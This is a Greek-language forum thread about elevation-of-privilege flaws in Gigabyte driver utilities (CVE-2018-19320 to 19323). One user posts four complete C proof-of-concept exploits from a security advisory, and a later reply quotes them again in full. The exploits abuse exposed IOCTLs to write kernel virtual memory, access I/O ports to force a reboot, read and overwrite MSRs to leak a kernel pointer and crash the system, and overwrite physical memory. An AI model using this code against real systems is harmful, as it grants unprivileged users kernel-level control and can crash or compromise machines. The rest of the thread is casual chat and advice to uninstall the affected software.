Προς το περιεχόμενο

Driver της Gigabyte ίσως επέτρεψε σε hackers να υποκλέψουν δεδομένα


trib

Προτεινόμενες αναρτήσεις

Δημοσ. (επεξεργασμένο)
49 λεπτά πριν, PsaxeAllou είπε

Με αποζημειώσεις να ξεκινάνε για εταιρίες προς ιδιώτες 5000ευρώ και απο εταιρίες προς εταιρίες 20000ευρώ βάση Ευρωπαικού νόμου την βλέπω την Gigabyte να κλείνει εν ευθαίτω χρόνο ....κρίμα γιατί σαν hardware είναι αρκετά αξιόπιστη μέχρι στιγμής 

Οπότε θα μειωθούν και άλλο οι επενδύσεις και θα φύγουν και άλλες χώρες από την ΕΕ που έχει φτάσει να έχει τεράστια γραφειοκρατία που εμποδίζει επενδύσεις.

Επεξ/σία από skiabox
  • Like 1
Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

21 λεπτά πριν, neo80 είπε

Για την intel δεν λέτε που είναι σουρωτήρι κανονικό. ;)

Σε αντίστοιχο άρθρο για την Intel θα τα ξαναπούμε γιατί και αυτή δεν πάει πίσω. Προς το παρών, όμως, η Gigabyte είναι το θέμα συζήτησης.

  • Like 1
Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

37 λεπτά πριν, telas είπε

Ποιος driver είναι ρε παιδιά να ξέρουμε;

  • GIGABYTE APP Center v1.05.21 and previous
  • AORUS GRAPHICS ENGINE v1.33 and previous
  • XTREME GAMING ENGINE v1.25 and previous
  • OC GURU II v2.08

Από το https://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities

Από ότι φαίνεται το πρόβλημα δεν υπάρχει σε μεταγενέστερους drivers.

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

2 ώρες πριν, skiabox είπε

Οπότε θα μειωθούν και άλλο οι επενδύσεις και θα φύγουν και άλλες χώρες από την ΕΕ που έχει φτάσει να έχει τεράστια γραφειοκρατία που εμποδίζει επενδύσεις.

Αμην

 

2 ώρες πριν, skiabox είπε

Οπότε θα μειωθούν και άλλο οι επενδύσεις και θα φύγουν και άλλες χώρες από την ΕΕ που έχει φτάσει να έχει τεράστια γραφειοκρατία που εμποδίζει επενδύσεις.

Αν και θα έλεγα ότι η gigabyte είναι Αμερικάνικη 

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

6 ώρες πριν, PsaxeAllou είπε

Με αποζημειώσεις να ξεκινάνε για εταιρίες προς ιδιώτες 5000ευρώ και απο εταιρίες προς εταιρίες 20000ευρώ βάση Ευρωπαικού νόμου την βλέπω την Gigabyte να κλείνει εν ευθαίτω χρόνο ....κρίμα γιατί σαν hardware είναι αρκετά αξιόπιστη μέχρι στιγμής 

That escalated quickly

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Δημοσ. (επεξεργασμένο)

GIGABYTE Drivers Elevation of Privilege Vulnerabilities

Arbitrary ring0 VM read/write

Proof of Concept:

// GIGABYTE PoC demonstrating non-pivileged R/W access to abritrary virtual memory

#include <windows.h>
#include <stdio.h>

#define IOCTL_GIO_MEMCPY 0xC3502808

HANDLE ghDriver = 0;

#pragma pack (push,1)

typedef struct _GIO_MemCpyStruct {
	ULONG64 dest;
	ULONG64 src;
	DWORD size;
} GIO_MemCpyStruct;

#pragma pack(pop)

BOOL GIO_memcpy(ULONG64 dest, ULONG64 src, DWORD size)
{
	GIO_MemCpyStruct mystructIn = { dest, src, size};
	BYTE outbuffer[0x30] = { 0 };
	DWORD returned = 0;

	DeviceIoControl(ghDriver, IOCTL_GIO_MEMCPY, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)outbuffer, sizeof(outbuffer), & returned, NULL);
	if (returned) {
		return TRUE;
	}
	return FALSE;
}

BOOL InitDriver()
{
	char szDeviceNames[] = "\\\\.\\GIO";
	ghDriver = CreateFile(szDeviceNames, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

	if (ghDriver == INVALID_HANDLE_VALUE) {
		printf("Cannot get handle to driver \'%s\' - GetLastError:%d\n", szDeviceNames, GetLastError());
		return FALSE;
	}
	return TRUE;
}

int main(int argc, char* argv[])
{
	if (!InitDriver()) {
		exit(0);
	}
	printf("GIGABYTE PoC (arbitrary ring0 write) - pnx!/CORE\n");
	printf("press ENTER for instant BSOD\n");
	getchar();
	ULONG64 data = 0xFFFF1111FFFF2222;
	GIO_memcpy(0, (ULONG64)&data, 8);
	CloseHandle(ghDriver);

	return 0;
}     

 

Port mapped I/O access

Proof of Concept:

// GIGABYTE PoC demonstrating non-privileged access to IO ports

// This harmless PoC only reboots the PC, much more sinister stuff 
// would also be possible by abusing this functionality.

#include <windows.h>
#include <stdio.h>

// for \\.\GPCIDrv64
#define IOCTL_GPCIDRV_PORTREADB 0x9C402588
#define IOCTL_GPCIDRV_PORTWRITEB 0x9C40258C

// for \\.\GIO
#define IOCTL_GIO_PORTREADB 0x0C3506404 
#define IOCTL_GIO_PORTWRITEB 0x0C350A440

HANDLE ghDriver = 0;

typedef BYTE(*fnPMIOReadB)(WORD port);
typedef BYTE(*fnPMIOWriteB)(WORD port, BYTE value);

#pragma pack (push,1)

typedef struct  {
	DWORD DriverIndex;		// DriverEnum index
	BYTE DeviceName[MAX_PATH];
	fnPMIOReadB pPMIOReadB;
	fnPMIOWriteB pPMIOWriteB;
} AutoConfigStruct;

AutoConfigStruct gConfig = { 0 };

enum DriverEnum {
	GPCIDrv64 = 1,
	GIO,
};

typedef struct _GPCIDRV_PORTIO_STRUCT {
	DWORD port;
	ULONG64 value;
} GPCIDRV_PORTIO_STRUCT;

#pragma pack(pop)

#define IOCTLMACRO(iocontrolcode, size) \
	BYTE outbuffer[0x30] = { 0 };	\
	DWORD returned = 0;	\
	DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);	\
	return outbuffer[0];	\

BYTE GPCIDrv_PMIOReadB(WORD port)
{
	GPCIDRV_PORTIO_STRUCT  inbuffer = { port, 0};
	IOCTLMACRO(IOCTL_GPCIDRV_PORTREADB, 10)
}

BYTE GPCIDrv_PMIOWriteB(WORD port, BYTE value)
{
	GPCIDRV_PORTIO_STRUCT  inbuffer = { port, value};
	IOCTLMACRO(IOCTL_GPCIDRV_PORTWRITEB, 10)
}

BYTE GIO_PMIOReadB(WORD port)
{
	GPCIDRV_PORTIO_STRUCT  inbuffer = { port, 0 };
	IOCTLMACRO(IOCTL_GIO_PORTREADB, 4)
}

BYTE GIO_PMIOWriteB(WORD port, BYTE value)
{
	GPCIDRV_PORTIO_STRUCT  inbuffer = { port, value };
	IOCTLMACRO(IOCTL_GIO_PORTWRITEB, 5)
}

void Reboot()
{
	BYTE cf9 = gConfig.pPMIOReadB(0xcf9) & ~0x6;
	gConfig.pPMIOWriteB(0xcf9, cf9 | 2);
	Sleep(50);
	gConfig.pPMIOWriteB(0xcf9, cf9 | 0xe);
	Sleep(50);
}

BOOL InitDriver()
{
	char *szDeviceNames[] = { "\\\\.\\GPCIDrv64" , "\\\\.\\GIO" };
	BYTE i = 0;
	for (i = 0; i < 2; i++) {
		ghDriver = CreateFile(szDeviceNames[i], GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

		if (ghDriver == INVALID_HANDLE_VALUE) {
			printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceNames[i], GetLastError());
			continue;
		}

		gConfig.DriverIndex = i+1;
		memcpy(gConfig.DeviceName, szDeviceNames[i], MAX_PATH-1);
		break;
	}

	switch (gConfig.DriverIndex) {
		case DriverEnum::GPCIDrv64:
		{
			gConfig.pPMIOReadB = (fnPMIOReadB)GPCIDrv_PMIOReadB;
			gConfig.pPMIOWriteB = (fnPMIOWriteB)GPCIDrv_PMIOWriteB;
		}
		break;

		case DriverEnum::GIO:
		{
			gConfig.pPMIOReadB = (fnPMIOReadB)GIO_PMIOReadB;
			gConfig.pPMIOWriteB = (fnPMIOWriteB)GIO_PMIOWriteB;
		}
		break;

		default:
			break;
	}


	return gConfig.DriverIndex ? TRUE : FALSE;
}

int main(int argc, char* argv[])
{
	printf("GIGABYTE PoC (PMIO access) - pnx!/CORE\n");
	
	if (!InitDriver()) {
		printf("InitDriver failed! - aborting...\n");
		exit(0);
	}

	printf("DeviceName: \'%s\' Handle: %08x\n", gConfig.DeviceName, (DWORD)ghDriver);

	Reboot();
	return CloseHandle(ghDriver);
}        

 

MSR Register access

Proof of Concept:

// GIGABYTE GIO driver PoC demonstrating non-privileged access to MSR registers

// This PoC demonstrates non privileged MSR access by reading 
// IA32_LSTAR value (leaks a kernel function pointer bypassing KASLR)
// and then writing garbage to it (instant BSOD!)

#include <windows.h>
#include <stdio.h>

#define IOCTL_GIO_MSRACCESS 0x0C3502580

HANDLE ghDriver = 0;

#pragma pack (push,1)

typedef struct _GIO_MSRIO_STRUCT {
	DWORD rw;			// 0 read - 1 write
	DWORD reg;			// 
	ULONG64 value;		// 
} GIO_MSRIO_STRUCT;

#pragma pack(pop)

#define IOCTLMACRO(iocontrolcode, size) \
	DWORD returned = 0;	\
	DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);	\
	return outbuffer[1];	\

ULONG64 GIO_RDMSR(DWORD reg)
{
	ASIO_MSRIO_STRUCT inbuffer = { 1, reg };
	ULONG64 outbuffer[2] = { 0 };	
	IOCTLMACRO(IOCTL_GIO_MSRACCESS, 16)
}

ULONG64 GIO_WRMSR(DWORD reg, ULONG64 value)
{
	ASIO_MSRIO_STRUCT inbuffer = { 0, reg, value };
	ULONG64 outbuffer[2] = { 0 };	
	IOCTLMACRO(IOCTL_GIO_MSRACCESS, 16)
}

BOOL InitDriver()
{
	char szDeviceName[] = "\\\\.\\GIO";
	ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

	if (ghDriver == INVALID_HANDLE_VALUE) {
		printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
		return FALSE;
	}
	return TRUE;
}

int main(int argc, char* argv[])
{
	printf("GIGABYTE PoC (MSR access) - pnx!/CORE\n");
	
	if (!InitDriver()) {
		printf("InitDriver failed! - aborting...\n");
		exit(0);
	}

	ULONG64 a = GIO_RDMSR(0xC0000082);
	printf("IA322_LSTAR: %llx (nt!KiSystemCall64)\n", a);
	printf("press ENTER for instant BSOD\n");
	getchar();
	a = GIO_WRMSR(0xC0000082, 0xffff1111ffff2222);
	return CloseHandle(ghDriver);
}       

 

Arbitrary physical memory read/write

Proof of Concept:

// GIGABYTE PoC (arbitrary physical memory read/write)

#include <windows.h>
#include <stdio.h>

#define IOCTL_GIO_MAPPHYSICAL	0xC3502004
#define IOCTL_GIO_UNMAPPHYSICAL 0xC3502008

#define IOCTL_GPCI_MAPPHYSICAL	 0x9C402580
#define IOCTL_GPCI_UNMAPPHYSICAL 0x9C402584

HANDLE ghDriver = 0;

typedef ULONG64(*fnMapPhysical)(ULONG64 physicaladdress);
typedef ULONG64(*fnUnMapPhysical)(ULONG64 address);

#pragma pack (push,1)

typedef struct _GIO_PHMAP {
	DWORD InterfaceType;
	DWORD Bus;
	ULONG64 PhysicalAddress;
	DWORD IOSpace;
	DWORD size;
} GIO_PHMAP;

typedef struct _GPCI_PHMAP {
	DWORD PhysicalAddress;
	DWORD size;
} GPCI_PHMAP;

typedef struct {
	DWORD DriverIndex;		// DriverEnum index
	BYTE DeviceName[MAX_PATH];
	fnMapPhysical pMapPhysical;
	fnUnMapPhysical pUnMapPhysical;
} AutoConfigStruct;

AutoConfigStruct gConfig = { 0 };

enum DriverEnum {
	GPCIDrv64 = 1,
	GIO,
};

#pragma pack(pop)


#define IOCTLMACRO(iocontrolcode) \
	ULONG64 outbuffer[2] = { 0 };	\
	DWORD returned = 0;	\
	DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, sizeof(inbuffer), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);	\
	return outbuffer[0];	\

ULONG64 GIO_mapPhysical(ULONG64 physicaladdress)
{
	GIO_PHMAP inbuffer = { 0, 0, physicaladdress, 0, 0x1000};
	IOCTLMACRO(IOCTL_GIO_MAPPHYSICAL)
}

ULONG64 GIO_unmapPhysical(ULONG64 address)
{
	ULONG64 inbuffer = address;
	IOCTLMACRO(IOCTL_GIO_UNMAPPHYSICAL)
}

ULONG64 GPCI_mapPhysical(DWORD physicaladdress)
{
	GPCI_PHMAP inbuffer = { physicaladdress, 0x1000};
	IOCTLMACRO(IOCTL_GPCI_MAPPHYSICAL)
}

ULONG64 GPCI_unmapPhysical(ULONG64 address)
{
	ULONG64 inbuffer = address;
	IOCTLMACRO(IOCTL_GPCI_UNMAPPHYSICAL)
}

BOOL InitDriver()
{
	char *szDeviceNames[] = { "\\\\.\\GPCIDrv64" , "\\\\.\\GIO" };
	BYTE i = 0;
	for (i = 0; i < 2; i++) {
		ghDriver = CreateFile(szDeviceNames[i], GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

		if (ghDriver == INVALID_HANDLE_VALUE) {
			printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceNames[i], GetLastError());
			continue;
		}

		gConfig.DriverIndex = i + 1;
		memcpy(gConfig.DeviceName, szDeviceNames[i], MAX_PATH - 1);
		break;
	}

	switch (gConfig.DriverIndex) {
	case DriverEnum::GPCIDrv64:
	{
		gConfig.pMapPhysical = (fnMapPhysical)GPCI_mapPhysical;
		gConfig.pUnMapPhysical = (fnUnMapPhysical)GPCI_unmapPhysical;
	}
	break;

	case DriverEnum::GIO:
	{
		gConfig.pMapPhysical = (fnMapPhysical)GIO_mapPhysical;
		gConfig.pUnMapPhysical = (fnUnMapPhysical)GIO_unmapPhysical;
	}
	break;

	default:
		break;
	}

	return gConfig.DriverIndex ? TRUE : FALSE;
}


int main(int argc, char * argv[])
{
	if (!InitDriver()) {
		exit(0);
	}

	printf("GIGABYTE PoC (arbitrary physical memory read/write) - pnx!/CORE\n");
	printf("press ENTER for System CRASH\n");
	getchar();
	printf("Bruteforcing");
	for (unsigned int i = 0; i < 0xffffffff; i+=0x1000) {
		printf(".");
		ULONG64 mappedVA = gConfig.pMapPhysical(i);
		*(ULONG64 *)mappedVA = 0xCCCCCCCCCCCCCCCC;
		gConfig.pUnMapPhysical(mappedVA);
	}
	CloseHandle(ghDriver);
	return 0;
}       

Vulnerability Information

Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes

CVE Name: CVE-2018-19320, CVE-2018-19322, CVE-2018-19323, CVE-2018-19321

 

Δεν βαρέθηκες βρε μπαγάσα να γράφεις ένα σεντόνι κώδικα για ένα local exploit ? 

Επεξ/σία από htaccess
  • Like 2
Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

9 ώρες πριν, protathlitis είπε
  • GIGABYTE APP Center v1.05.21 and previous
  • AORUS GRAPHICS ENGINE v1.33 and previous
  • XTREME GAMING ENGINE v1.25 and previous
  • OC GURU II v2.08

Από το https://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities

Από ότι φαίνεται το πρόβλημα δεν υπάρχει σε μεταγενέστερους drivers.

Σε ευχαριστώ πολύ τα έκανα uninstall (app center) just in case, δεν το διακινδυνεύω.

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Aorus ...  προβληματικη για χιλιους λογους και την χωνουν και στους drivers αμα δειτε το cd και στα τελευταια mobo / καρτες γραφικων ειναι μεσα ...

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Δημοσ. (επεξεργασμένο)
16 ώρες πριν, htaccess είπε

GIGABYTE Drivers Elevation of Privilege Vulnerabilities

Arbitrary ring0 VM read/write

Proof of Concept:


// GIGABYTE PoC demonstrating non-pivileged R/W access to abritrary virtual memory

#include <windows.h>
#include <stdio.h>

#define IOCTL_GIO_MEMCPY 0xC3502808

HANDLE ghDriver = 0;

#pragma pack (push,1)

typedef struct _GIO_MemCpyStruct {
	ULONG64 dest;
	ULONG64 src;
	DWORD size;
} GIO_MemCpyStruct;

#pragma pack(pop)

BOOL GIO_memcpy(ULONG64 dest, ULONG64 src, DWORD size)
{
	GIO_MemCpyStruct mystructIn = { dest, src, size};
	BYTE outbuffer[0x30] = { 0 };
	DWORD returned = 0;

	DeviceIoControl(ghDriver, IOCTL_GIO_MEMCPY, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)outbuffer, sizeof(outbuffer), & returned, NULL);
	if (returned) {
		return TRUE;
	}
	return FALSE;
}

BOOL InitDriver()
{
	char szDeviceNames[] = "\\\\.\\GIO";
	ghDriver = CreateFile(szDeviceNames, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

	if (ghDriver == INVALID_HANDLE_VALUE) {
		printf("Cannot get handle to driver \'%s\' - GetLastError:%d\n", szDeviceNames, GetLastError());
		return FALSE;
	}
	return TRUE;
}

int main(int argc, char* argv[])
{
	if (!InitDriver()) {
		exit(0);
	}
	printf("GIGABYTE PoC (arbitrary ring0 write) - pnx!/CORE\n");
	printf("press ENTER for instant BSOD\n");
	getchar();
	ULONG64 data = 0xFFFF1111FFFF2222;
	GIO_memcpy(0, (ULONG64)&data, 8);
	CloseHandle(ghDriver);

	return 0;
}     

Port mapped I/O access

Proof of Concept:


// GIGABYTE PoC demonstrating non-privileged access to IO ports

// This harmless PoC only reboots the PC, much more sinister stuff 
// would also be possible by abusing this functionality.

#include <windows.h>
#include <stdio.h>

// for \\.\GPCIDrv64
#define IOCTL_GPCIDRV_PORTREADB 0x9C402588
#define IOCTL_GPCIDRV_PORTWRITEB 0x9C40258C

// for \\.\GIO
#define IOCTL_GIO_PORTREADB 0x0C3506404 
#define IOCTL_GIO_PORTWRITEB 0x0C350A440

HANDLE ghDriver = 0;

typedef BYTE(*fnPMIOReadB)(WORD port);
typedef BYTE(*fnPMIOWriteB)(WORD port, BYTE value);

#pragma pack (push,1)

typedef struct  {
	DWORD DriverIndex;		// DriverEnum index
	BYTE DeviceName[MAX_PATH];
	fnPMIOReadB pPMIOReadB;
	fnPMIOWriteB pPMIOWriteB;
} AutoConfigStruct;

AutoConfigStruct gConfig = { 0 };

enum DriverEnum {
	GPCIDrv64 = 1,
	GIO,
};

typedef struct _GPCIDRV_PORTIO_STRUCT {
	DWORD port;
	ULONG64 value;
} GPCIDRV_PORTIO_STRUCT;

#pragma pack(pop)

#define IOCTLMACRO(iocontrolcode, size) \
	BYTE outbuffer[0x30] = { 0 };	\
	DWORD returned = 0;	\
	DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);	\
	return outbuffer[0];	\

BYTE GPCIDrv_PMIOReadB(WORD port)
{
	GPCIDRV_PORTIO_STRUCT  inbuffer = { port, 0};
	IOCTLMACRO(IOCTL_GPCIDRV_PORTREADB, 10)
}

BYTE GPCIDrv_PMIOWriteB(WORD port, BYTE value)
{
	GPCIDRV_PORTIO_STRUCT  inbuffer = { port, value};
	IOCTLMACRO(IOCTL_GPCIDRV_PORTWRITEB, 10)
}

BYTE GIO_PMIOReadB(WORD port)
{
	GPCIDRV_PORTIO_STRUCT  inbuffer = { port, 0 };
	IOCTLMACRO(IOCTL_GIO_PORTREADB, 4)
}

BYTE GIO_PMIOWriteB(WORD port, BYTE value)
{
	GPCIDRV_PORTIO_STRUCT  inbuffer = { port, value };
	IOCTLMACRO(IOCTL_GIO_PORTWRITEB, 5)
}

void Reboot()
{
	BYTE cf9 = gConfig.pPMIOReadB(0xcf9) & ~0x6;
	gConfig.pPMIOWriteB(0xcf9, cf9 | 2);
	Sleep(50);
	gConfig.pPMIOWriteB(0xcf9, cf9 | 0xe);
	Sleep(50);
}

BOOL InitDriver()
{
	char *szDeviceNames[] = { "\\\\.\\GPCIDrv64" , "\\\\.\\GIO" };
	BYTE i = 0;
	for (i = 0; i < 2; i++) {
		ghDriver = CreateFile(szDeviceNames[i], GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

		if (ghDriver == INVALID_HANDLE_VALUE) {
			printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceNames[i], GetLastError());
			continue;
		}

		gConfig.DriverIndex = i+1;
		memcpy(gConfig.DeviceName, szDeviceNames[i], MAX_PATH-1);
		break;
	}

	switch (gConfig.DriverIndex) {
		case DriverEnum::GPCIDrv64:
		{
			gConfig.pPMIOReadB = (fnPMIOReadB)GPCIDrv_PMIOReadB;
			gConfig.pPMIOWriteB = (fnPMIOWriteB)GPCIDrv_PMIOWriteB;
		}
		break;

		case DriverEnum::GIO:
		{
			gConfig.pPMIOReadB = (fnPMIOReadB)GIO_PMIOReadB;
			gConfig.pPMIOWriteB = (fnPMIOWriteB)GIO_PMIOWriteB;
		}
		break;

		default:
			break;
	}


	return gConfig.DriverIndex ? TRUE : FALSE;
}

int main(int argc, char* argv[])
{
	printf("GIGABYTE PoC (PMIO access) - pnx!/CORE\n");
	
	if (!InitDriver()) {
		printf("InitDriver failed! - aborting...\n");
		exit(0);
	}

	printf("DeviceName: \'%s\' Handle: %08x\n", gConfig.DeviceName, (DWORD)ghDriver);

	Reboot();
	return CloseHandle(ghDriver);
}        

MSR Register access

Proof of Concept:


// GIGABYTE GIO driver PoC demonstrating non-privileged access to MSR registers

// This PoC demonstrates non privileged MSR access by reading 
// IA32_LSTAR value (leaks a kernel function pointer bypassing KASLR)
// and then writing garbage to it (instant BSOD!)

#include <windows.h>
#include <stdio.h>

#define IOCTL_GIO_MSRACCESS 0x0C3502580

HANDLE ghDriver = 0;

#pragma pack (push,1)

typedef struct _GIO_MSRIO_STRUCT {
	DWORD rw;			// 0 read - 1 write
	DWORD reg;			// 
	ULONG64 value;		// 
} GIO_MSRIO_STRUCT;

#pragma pack(pop)

#define IOCTLMACRO(iocontrolcode, size) \
	DWORD returned = 0;	\
	DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);	\
	return outbuffer[1];	\

ULONG64 GIO_RDMSR(DWORD reg)
{
	ASIO_MSRIO_STRUCT inbuffer = { 1, reg };
	ULONG64 outbuffer[2] = { 0 };	
	IOCTLMACRO(IOCTL_GIO_MSRACCESS, 16)
}

ULONG64 GIO_WRMSR(DWORD reg, ULONG64 value)
{
	ASIO_MSRIO_STRUCT inbuffer = { 0, reg, value };
	ULONG64 outbuffer[2] = { 0 };	
	IOCTLMACRO(IOCTL_GIO_MSRACCESS, 16)
}

BOOL InitDriver()
{
	char szDeviceName[] = "\\\\.\\GIO";
	ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

	if (ghDriver == INVALID_HANDLE_VALUE) {
		printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
		return FALSE;
	}
	return TRUE;
}

int main(int argc, char* argv[])
{
	printf("GIGABYTE PoC (MSR access) - pnx!/CORE\n");
	
	if (!InitDriver()) {
		printf("InitDriver failed! - aborting...\n");
		exit(0);
	}

	ULONG64 a = GIO_RDMSR(0xC0000082);
	printf("IA322_LSTAR: %llx (nt!KiSystemCall64)\n", a);
	printf("press ENTER for instant BSOD\n");
	getchar();
	a = GIO_WRMSR(0xC0000082, 0xffff1111ffff2222);
	return CloseHandle(ghDriver);
}       

Arbitrary physical memory read/write

Proof of Concept:


// GIGABYTE PoC (arbitrary physical memory read/write)

#include <windows.h>
#include <stdio.h>

#define IOCTL_GIO_MAPPHYSICAL	0xC3502004
#define IOCTL_GIO_UNMAPPHYSICAL 0xC3502008

#define IOCTL_GPCI_MAPPHYSICAL	 0x9C402580
#define IOCTL_GPCI_UNMAPPHYSICAL 0x9C402584

HANDLE ghDriver = 0;

typedef ULONG64(*fnMapPhysical)(ULONG64 physicaladdress);
typedef ULONG64(*fnUnMapPhysical)(ULONG64 address);

#pragma pack (push,1)

typedef struct _GIO_PHMAP {
	DWORD InterfaceType;
	DWORD Bus;
	ULONG64 PhysicalAddress;
	DWORD IOSpace;
	DWORD size;
} GIO_PHMAP;

typedef struct _GPCI_PHMAP {
	DWORD PhysicalAddress;
	DWORD size;
} GPCI_PHMAP;

typedef struct {
	DWORD DriverIndex;		// DriverEnum index
	BYTE DeviceName[MAX_PATH];
	fnMapPhysical pMapPhysical;
	fnUnMapPhysical pUnMapPhysical;
} AutoConfigStruct;

AutoConfigStruct gConfig = { 0 };

enum DriverEnum {
	GPCIDrv64 = 1,
	GIO,
};

#pragma pack(pop)


#define IOCTLMACRO(iocontrolcode) \
	ULONG64 outbuffer[2] = { 0 };	\
	DWORD returned = 0;	\
	DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, sizeof(inbuffer), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);	\
	return outbuffer[0];	\

ULONG64 GIO_mapPhysical(ULONG64 physicaladdress)
{
	GIO_PHMAP inbuffer = { 0, 0, physicaladdress, 0, 0x1000};
	IOCTLMACRO(IOCTL_GIO_MAPPHYSICAL)
}

ULONG64 GIO_unmapPhysical(ULONG64 address)
{
	ULONG64 inbuffer = address;
	IOCTLMACRO(IOCTL_GIO_UNMAPPHYSICAL)
}

ULONG64 GPCI_mapPhysical(DWORD physicaladdress)
{
	GPCI_PHMAP inbuffer = { physicaladdress, 0x1000};
	IOCTLMACRO(IOCTL_GPCI_MAPPHYSICAL)
}

ULONG64 GPCI_unmapPhysical(ULONG64 address)
{
	ULONG64 inbuffer = address;
	IOCTLMACRO(IOCTL_GPCI_UNMAPPHYSICAL)
}

BOOL InitDriver()
{
	char *szDeviceNames[] = { "\\\\.\\GPCIDrv64" , "\\\\.\\GIO" };
	BYTE i = 0;
	for (i = 0; i < 2; i++) {
		ghDriver = CreateFile(szDeviceNames[i], GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

		if (ghDriver == INVALID_HANDLE_VALUE) {
			printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceNames[i], GetLastError());
			continue;
		}

		gConfig.DriverIndex = i + 1;
		memcpy(gConfig.DeviceName, szDeviceNames[i], MAX_PATH - 1);
		break;
	}

	switch (gConfig.DriverIndex) {
	case DriverEnum::GPCIDrv64:
	{
		gConfig.pMapPhysical = (fnMapPhysical)GPCI_mapPhysical;
		gConfig.pUnMapPhysical = (fnUnMapPhysical)GPCI_unmapPhysical;
	}
	break;

	case DriverEnum::GIO:
	{
		gConfig.pMapPhysical = (fnMapPhysical)GIO_mapPhysical;
		gConfig.pUnMapPhysical = (fnUnMapPhysical)GIO_unmapPhysical;
	}
	break;

	default:
		break;
	}

	return gConfig.DriverIndex ? TRUE : FALSE;
}


int main(int argc, char * argv[])
{
	if (!InitDriver()) {
		exit(0);
	}

	printf("GIGABYTE PoC (arbitrary physical memory read/write) - pnx!/CORE\n");
	printf("press ENTER for System CRASH\n");
	getchar();
	printf("Bruteforcing");
	for (unsigned int i = 0; i < 0xffffffff; i+=0x1000) {
		printf(".");
		ULONG64 mappedVA = gConfig.pMapPhysical(i);
		*(ULONG64 *)mappedVA = 0xCCCCCCCCCCCCCCCC;
		gConfig.pUnMapPhysical(mappedVA);
	}
	CloseHandle(ghDriver);
	return 0;
}       

Vulnerability Information

Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes

CVE Name: CVE-2018-19320, CVE-2018-19322, CVE-2018-19323, CVE-2018-19321

Δεν βαρέθηκες βρε μπαγάσα να γράφεις ένα σεντόνι κώδικα για ένα local exploit ? 

όταν ο άνθρωπος ζει για να παρακολουθεί τους άλλους....

 

Επεξ/σία από PsaxeAllou
Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Τώρα αμέσως πάω να κάνω μήνυση.Και θα ακολουθήσει και αγωγή , γιατί ως γνωστόν ,την κάθε Gigabyte , την πονάει μόνο η τσέπη. Επίσης ..  " πάρε το 100"  , 

- " Τι τηλέφωνο έχει ;"

Ρε τι μου θυμίζει , τι μου θυμίζει ????

20 ώρες πριν, htaccess είπε

GIGABYTE Drivers Elevation of Privilege Vulnerabilities

Arbitrary ring0 VM read/write

Proof of Concept:


// GIGABYTE PoC demonstrating non-pivileged R/W access to abritrary virtual memory

